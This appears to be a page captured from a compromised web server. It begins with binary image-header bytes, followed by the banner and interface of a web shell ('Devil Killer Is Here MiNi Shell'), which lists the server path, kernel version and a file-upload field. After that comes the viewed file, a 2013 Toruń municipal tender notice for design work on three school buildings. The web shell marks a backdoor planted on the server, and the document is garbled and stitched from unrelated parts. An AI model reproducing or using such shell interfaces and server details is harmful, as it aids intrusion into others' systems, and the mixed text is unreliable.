JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131010/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131010/412550-N-2013.html

<p class="kh_header"><b>Toruń: Wykonanie wielobranżowej dokumentacji projektowo-kosztorysowej: 1) Remont i przebudowa zaplecza Hali Sportowej ZS nr 10 przy ul. Św. Katarzyny 9 w Toruniu,  2) Remont ceglanego budynku V LO przy ul. Sienkiewicza 34 w Toruniu zbiegu ul. Sienkiewicza i Fałata,  3) Przystosowanie części pomieszczeń na cele przedszkola w budynku SP nr 17 przy ul. Rudackiej 15 w Toruniu.</b><br>
<b>Numer ogłoszenia: 412550 - 2013; data zamieszczenia: 10.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Toruń reprezentowana przez Prezydenta Miasta Torunia , ul. Wały gen. Sikorskiego 8, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6118713, faks 056 6118622.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> um.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie wielobranżowej dokumentacji projektowo-kosztorysowej: 1) Remont i przebudowa zaplecza Hali Sportowej ZS nr 10 przy ul. Św. Katarzyny 9 w Toruniu,  2) Remont ceglanego budynku V LO przy ul. Sienkiewicza 34 w Toruniu zbiegu ul. Sienkiewicza i Fałata,  3) Przystosowanie części pomieszczeń na cele przedszkola w budynku SP nr 17 przy ul. Rudackiej 15 w Toruniu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje  wykonanie dokumentacji projektowej:  
 Część  I - Remontu i przebudowy zaplecza Hali Sportowej Zespołu Szkół nr 10, Pl. Św. Katarzyny 9 w Toruniu,
 Część II - Remontu ceglanego budynku V Liceum Ogólnokształcącego przy
 ul. Sienkiewicza 34 w  Toruniu u zbiegu ul. Sienkiewicza i Fałata, 
 Część III - Przystosowania części pomieszczeń na cele przedszkola w budynku 
nr 2 Szkoły  Podstawowej nr 17 przy ul. Rudackiej 15 w Toruniu.

Zakres dokumentacji projektowej obejmuje:     
Część I: Remont i przebudowa zaplecza Hali Sportowej Zespołu Szkół nr 10, Pl. Św. Katarzyny 9 w Toruniu:
- kompleksowy remont węzłów sanitarno-szatniowych parteru i I piętra oraz dwóch pozostałych łazienek, 
-kompleksową wymianę instalacji wod.-kan. wraz z instalacją podposadzkową w obiekcie,
-wymianę instalacji elektrycznych w remontowanych pomieszczeniach,
-zapewnienie wymaganej wentylacji w remontowanych pomieszczeniach,
-wymianę zewnętrznej instalacji kanalizacji sanitarnej i deszczowej, która obsługuje Halę Sportową wraz z przykanalikami kanalizacji sanitarnej do obiektu i rur deszczowych (spustowych).
Podstawowe założenia do realizacji przedmiotu umowy:
 -   Obiekt jest pod nadzorem konserwatorskim i wymaga uzgodnienia z Miejskim Konserwatorem   
      Zabytków.
 -  Gabaryty Hali Sportowej:
    kubatura - 9070,5 m3, 
    powierzchnia użytkowa - 1739,9 m2.

Część II: Remont ceglanego budynku V Liceum Ogólnokształcącego przy ul. Sienkiewicza 34  w  Toruniu u zbiegu ul. Sienkiewicza i Fałata:
- ocenę stanu technicznego budynku,  
- wymianę pokrycia dachowego wraz z częściową wymianą elementów więźby dachowej  oraz dociepleniem stropodachu,
- uzupełnienie ubytków w elewacji zewnętrznej z ewentualną wymianą orynnowania i instalacji odgromowej,
- instalację monitoringu,
- instalację podgrzewu rynien,
- wymianę nieremontowanej części stolarki zewnętrznej,
- naprawę lub wymianę stolarki wewnętrznej,
- wymianę instalacji elektrycznej,
- wymianę instalacji wod.-kan., 
- zapewnienie wymaganej wentylacji we wszystkich pomieszczeniach budynku, 
- wszystkie niezbędne roboty wykończeniowe: tynki, posadzki, malowanie lub glazura ścian i sufitów,
- izolacja przeciwwilgociowa i osuszenie ścian piwnic.
  Podstawowe założenia do realizacji przedmiotu umowy:
- Obiekt jest pod nadzorem konserwatorskim i wymaga uzgodnienia z Miejskim Konserwatorem Zabytków.
-  Gabaryty budynku:
    kubatura - 4658,0 m3, 
    powierzchnia użytkowa - 804,19 m2.
Część III:Przystosowanie części pomieszczeń na cele przedszkola w budynku nr 2 Szkoły  Podstawowej nr 17 przy ul. Rudackiej 15 w Toruniu:
- kompleksowy remont części pomieszczeń parteru na potrzeby przedszkola, w tym:
- wymianę stolarki okiennej i drzwiowej, 
- wymianę instalacji ciepłej i zimnej wody wraz z cyrkulacją w całym budynku,
- wymianę instalacji kanalizacyjnej i elektrycznej w remontowanych pomieszczeniach,
- montaż instalacji niskoprądowych w projektowanym przedszkolu,
- wymianę instalacji c.o. w zakresie niezbędnym do zapewnienia ciepła dla przedszkola (wg założeń zawartych w projekcie archiwalnym wymiany instalacji c.o. budynków Szkoły Podstawowej nr 17),  
- zapewnienie wymaganej wentylacji w remontowanych pomieszczeniach,
- roboty wykończeniowe: tynki, posadzki, glazura, malowanie, parapety,
- niezbędną przebudowę dla zapewnienia funkcji pomieszczeń dla celów przedszkola.
   Podstawowe założenia do realizacji przedmiotu umowy:
- Obiekt jest budynkiem dwukondygnacyjnym, podpiwniczonym z poddaszem.  
- Gabaryty budynku:
kubatura - 1912,8 m3, 
powierzchnia użytkowa - 511,0 m2.
- Powierzchnia użytkowa pomieszczeń obecnego mieszkania - 59,21 m2. 
- Obiekt jest pod nadzorem konserwatorskim i wymaga uzgodnienia z Miejskim Konserwatorem Zabytków.

Wykaz opracowań wchodzących w skład przedmiotu umowy (odrębnie dla poszczególnych części):  
1) wielobranżowy projekt budowlany zawierający wszystkie elementy projektu wykonawczego, w tym informację dotyczącą bezpieczeństwa i ochrony zdrowia,
2)projekt wyposażenia - dotyczy tylko części 3,   
3)specyfikacja techniczna wykonania i odbioru robót budowlanych (wszystkie branże)
+ wersja elektroniczna (format pdf),
4)kosztorys inwestorski + wersja elektroniczna  (format pdf i ath),
5)przedmiar robót  + wersja elektroniczna  (format pdf i ath),
6)zbiorcze zestawienie  kosztów inwestycji (ZZK), w tym wynikające z:  kosztorysów inwestorskich,  kosztów wykonania dokumentacji projektowej, nadzorów  inwestorskich i autorskich,  umów przyłączeniowych,  wyposażenia i innych,
7) inne opracowania niezbędne do uzyskania pozwolenia na użytkowanie obiektu,
8) dokumentacja projektowa  także w wersji elektronicznej w formacie pdf, doc., dwg.
Przedmiot zamówienia obejmuje ponadto (odrębnie dla poszczególnych części):
1) wykonanie mapy syt. - wys. w skali 1:500 z aktualizacją  do celów projektowych - dotyczy części 1, natomiast dla części 2 i części 3 - wymagane wykonanie mapy syt. - wys. w skali 1:500  do celów opiniodawczych,  
2) wykonanie mapy stanu prawnego terenu objętego projektowaną inwestycją,  
3) w razie potrzeby uzyskanie warunków technicznych od właściwych instytucji eksploatujących sieci (na podstawie przygotowanych przez Wykonawcę stosownych kompletnych wniosków z wymaganymi załącznikami do podpisu przez Zamawiającego),    
4) przygotowanie dokumentów do wystąpienia przez Zamawiającego o wymagane decyzje administracyjne, w tym decyzję o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia - dotyczy tylko części 2, decyzję o pozwoleniu na budowę/lub, gdy pozwolenie na budowę nie jest wymagane - do zgłoszenia zamiaru rozpoczęcia robót budowlanych  (przygotowane przez Wykonawcę stosowne kompletne wnioski  z wymaganymi załącznikami do podpisu przez Zamawiającego),
5) przeniesienie na Zamawiającego praw autorskich majątkowych do wykonanej dokumentacji projektowej w zakresie objętym umową.
   
Ustala się wykonanie opracowań  przedmiotu umowy (wersja papierowa) w ilości:  po 6 egz. każdego opracowania   (za wyjątkiem:  specyfikacje techniczne wykonania i odbioru robót budowlanych, przedmiary  robót,  kosztorysy inwestorskie, ZZK  - w 2 egz.), odrębnie dla każdego   projektu, z tym, że cztery egzemplarze projektu budowlanego będą zawierać oryginalne podpisy i pieczątki, a dwa egzemplarze mogą być kopiami.
Przedmiot umowy  należy wykonać także w wersji elektronicznej - w 2 egz. (w formacie pdf, doc, dwg, ath; 1egz. wersji elektronicznej powinien obejmować projekt, specyfikacje, przedmiary; a 2 egz. wersji elektronicznej powinien obejmować kosztorysy inwestorskie, ZZK), którą Wykonawca dostarczy w terminie 7 dni od daty bezusterkowego odbioru końcowego. Wersja elektroniczna winna posiadać nazewnictwo identyczne z zawartością opracowania w wersji papierowej.

Wykonawca zobowiązuje się do wykonania przedmiotu umowy zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi w tym zakresie przepisami, warunkami technicznymi i normami, na podstawie oględzin terenu inwestycji, przyjętą przez  Zamawiającego ofertą oraz niniejszą umową.
Opracowany przedmiot umowy powinien w szczególności:
1) spełniać wszystkie warunki określone w ustawie Prawo zamówień publicznych ( tekst jednolity: Dz.U. z 2013 r., poz. 907 z późn. zm.), art. 34 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tekst jednolity: Dz.U. z 2010 r. Nr 243, poz. 1623, z późn. zm.), rozporządzeniu Ministra Transportu, Budownictwa i Gospodarki Morskiej  z dnia 25 kwietnia 2012 r.  w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. poz. 462, z późn. zm.), rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jednolity: Dz. U. z 2013 r., poz. 1129), rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod  i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. nr 130, poz. 1389) oraz ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (tekst jednolity: Dz.U. z 2012 r., poz. 647 z późn. zm.) z tym, że do opracowania kosztorysu inwestorskiego Wykonawca stosować będzie ceny jednostkowe robót określone na podstawie danych rynku lokalnego oraz czynniki cenotwórcze określone w aktualnej w okresie sporządzania informacji w systemie Sekocenbud; wszelkie materiały, urządzenia lub produkty wskazane w dokumentacji projektowej muszą być opisane poprzez podanie odpowiednich granicznych parametrów, cech technicznych, jakościowych nawet w przypadku uprawnionego posługiwania się określeniem lub równoważny, nazwy własne materiałów, urządzeń lub produktów mogą być stosowane jedynie pomocniczo w przypadku dopuszczenia materiałów, urządzeń lub produktów równoważnych, 
2) posiadać komplet uzgodnień i pozwoleń wymaganych przepisami szczególnymi, 
a także uzgodnienie monitoringu z Wydziałem Ochrony Ludności UMT - dotyczy części 2 oraz   uzgodnienie z użytkownikiem  całości zaprojektowanych rozwiązań,  
3) zawierać niezbędne opinie, oceny, badania, ekspertyzy, rozwiązania ewentualnych kolizji, i inne niezbędne do prawidłowej realizacji  robót i oddania obiektu do użytkowania.

Materiałem wyjściowym do realizacji przedmiotu umowy jest dokumentacja umieszczona w załącznikach do SIWZ. Dla realizacji przedmiotu umowy Wykonawca winien wykonać wielobranżową inwentaryzację budowlaną do celów projektowych. Do wszystkich robót objętych przedmiotem umowy należy stosować materiały o standardzie właściwym do tego typu obiektów.  Zakres opracowania określono na podstawie wizji lokalnej, informacji uzyskanych od użytkownika i Wydziału Edukacji UMT  oraz dokumentacji archiwalnej.  

     Do obowiązków Wykonawcy należy też weryfikacja wszystkich otrzymanych materiałów, dokonanie wizji w terenie oraz ewentualne uzupełnienie w zakresie wymaganym do wykonania przedmiotu umowy.    
                       
Zamawiający  dopuszcza  możliwość  składania  ofert   częściowych z podziałem  na trzy części  zamówienia - część I , II oraz III.
Zamawiający  nie dopuszcza  możliwość  składania  ofert  wariantowych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających (art. 67 ust. 1 pkt. 6 PZP) stanowiących nie więcej niż 50% wartości zamówienia podstawowego i dotyczącego przedmiotu zamówienia - prac określonych w punkcie 1 SIWZ.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.25.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 600,00 zł (słownie: sześćset złotych 00/100) - całość 
Część I :   200,00 zł (słownie: dwieście złotych 00/100)
Część II:   300,00 zł (słownie: trzysta złotych 00/100)
Część III: 100,00 zł (słownie: sto złotych 00/100)
powinno być wniesione przed upływem terminu składania ofert. Okres ważności wadium powinien być zgodny z terminem związania ofertą.
Wadium może być wniesione w następujących formach;
a) pieniądzu - na konto UMT nr 67 1160 2202 0000 0000 6171 9146 z adnotacją: 

Wadium -  110/2013:  Część  I - Remontu i przebudowy zaplecza Hali Sportowej Zespołu Szkół nr 10, Pl. Św. Katarzyny 9 w Toruniu,  Część II - Remontu ceglanego budynku V Liceum Ogólnokształcącego przy ul. Sienkiewicza 34 w  Toruniu u zbiegu ul. Sienkiewicza i Fałata,  Część III - Przystosowania części pomieszczeń na cele przedszkola w budynku nr 2 Szkoły  Podstawowej nr 17 przy ul. Rudackiej 15 w Toruniu.
Za datę wniesienia wadium przyjmuję się datę jego wpływu na konto zamawiającego.
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony gdy wykonawca wykaże,  że  w  okresie  ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał   należycie  co  najmniej  2  usługi  -  prace  projektowe  dotyczące   obiektów kubaturowych, o wartości  minimum 5.000,00 zł  brutto każda. 
W przypadku składania oferty na więcej niż jedną cześć wykonawca może posługiwać się tym samym wykazem usług oraz dowodami potwierdzającymi, że usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony gdy wykonawca udowodni, że osoby, którymi dysponuje i które będą uczestniczyć w wykonaniu zamówienia posiadają uprawnienia budowlane do projektowania stosownie do powierzonych czynności w specjalności:
- architektonicznej,
- konstrukcyjno-budowlanej,
- instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i  kanalizacyjnych,
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
W przypadku składania oferty na więcej niż jedną cześć wykonawca może posługiwać się tym samym wykazem osób, które będą uczestniczyć w wykonaniu  zamówienia i spełniają postawiony przez zamawiającego warunek udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolności finansowej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. 
Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w pkt 3.2, 3.3. siwz polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentu wymienionego w pkt 4.3 siwz. 
Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w pkt 3.2.,3,3  siwz polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę 
z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentów dotyczących w szczególności: 
a) zakresu dostępnych Wykonawcy zasobów innego podmiotu, 
b) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia, 
c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, 
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 
Oświadczenia: 
a) oświadczenie, iż Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Pzp - załącznik nr 6 siwz. 
b) oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp - załącznik nr 7 siwz. 
c) oświadczenie Wykonawcy, które z informacji zawartych w ofercie na stronach od .... do .... stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy o zwalczaniu nieuczciwej konkurencji i jako takie nie mogą być udostępniane innym uczestnikom postępowania. 
Brak powyższego oświadczenia oznaczał będzie, że dokumenty składające się na ofertę nie stanowią tajemnicy przedsiębiorstwa (Wykonawca nie może zastrzec wszystkich dokumentów). 
d) oświadczenie stwierdzające, że osoby, które będą uczestniczy w wykonywaniu zamówienia posiadają wymagane uprawnienia,
e) oświadczenie Wykonawcy jaką cześć zamówienia zamierza powierzyć podwykonawcom (jeżeli wykonawca przewiduje wykonanie przedmiotu zamówienia przy udziale podwykonawców).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
